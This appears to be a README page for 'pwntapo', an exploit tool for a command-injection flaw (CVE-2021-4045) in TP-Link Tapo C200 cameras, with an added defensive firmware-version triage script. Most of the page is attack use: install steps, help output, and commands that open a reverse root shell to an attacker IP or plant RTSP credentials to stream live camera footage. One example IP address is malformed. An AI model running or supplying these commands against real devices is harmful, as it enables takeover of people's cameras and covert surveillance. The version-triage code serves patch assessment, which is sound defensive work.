"PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)"
Read about the exploit on Exploit-DB.
This is a command injection vulnerability that affects all TP-Link Tapo C200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works, read this article from hacefresko.
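For inventory triage, the affected-version statement above can be turned into a firmware check. This is an added example, not part of the pwntapo repository: the version-string layout is taken from the string quoted above, while the device names and every other firmware string are constructed. Because the title says "<=" and the body says "<", the exact build 1.1.16 Build 211209 is reported as "boundary" for manual verification.

```python
import re

# Fixed firmware named in the text above: 1.1.16 Build 211209 Rel. 37726N
FIXED = ((1, 1, 16), 211209)

# Layout assumed from the string quoted on this page:
#   "<major>.<minor>.<patch> Build <YYMMDD> [Rel. <id>]"
_FW_RE = re.compile(
    r"^\s*v?(\d+)\.(\d+)\.(\d+)\s+Build\s+(\d{6})(?:\s+Rel\.?\s*\S+)?\s*$",
    re.IGNORECASE,
)

def parse_firmware(text):
    """Return ((major, minor, patch), build) or None if the string is unparseable."""
    m = _FW_RE.match(text or "")
    if not m:
        return None
    major, minor, patch, build = (int(g) for g in m.groups())
    return ((major, minor, patch), build)

def triage(text):
    """Classify one firmware string against the fixed release."""
    fw = parse_firmware(text)
    if fw is None:
        return "unknown"      # cannot be ruled out, needs a manual look
    if fw < FIXED:
        return "vulnerable"   # older version, or same version with an older build
    if fw == FIXED:
        return "boundary"     # title and body of this page disagree on this build
    return "patched"

def report(inventory):
    """Group device names by triage status."""
    groups = {"vulnerable": [], "boundary": [], "patched": [], "unknown": []}
    for name, fw in inventory.items():
        groups[triage(fw)].append(name)
    return groups

# Constructed inventory (hypothetical device names; only the second
# firmware string appears on this page).
SAMPLE_INVENTORY = {
    "cam-lobby": "1.0.10 Build 200520",
    "cam-dock": "1.1.16 Build 211209 Rel. 37726N",
    "cam-lab": "1.1.16 Build 211001",
    "cam-roof": "1.3.0 Build 230101",
    "cam-old": "n/a",
}

if __name__ == "__main__":
    for status, names in report(SAMPLE_INVENTORY).items():
        print(f"{status:10s} {', '.join(names) or '-'}")
```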
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
python3 pwntapo.py -h
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]
PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)
options:
-h, --help show this help message and exit
-M M attack mode : shell | rtsp (default: None)
-U U RTSP_USER (default: None)
-P P RTSP_PASSWORD (default: None)
-C C RTSP_CIPHERTEXT (default: None)
-H H victim ip address (default: None)
-A A attacker ip address (default: None)
-p P Listening port (default: None)
-v increase output verbosity (default: False)
The exploit has two modes: shell and RTSP.
In shell mode you only need to provide the victim IP, the attacker IP and the listening port; this spawns a root shell on the device.
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887
[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...
Listening on 0.0.0.0 1887
In RTSP mode you need to provide RTSP_USER, RTSP_PASSWORD and RTSP_CIPHERTEXT to get live footage from the camera.
python3 pwntapo.py -M rtsp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=
[+] Setting up RTSP video stream...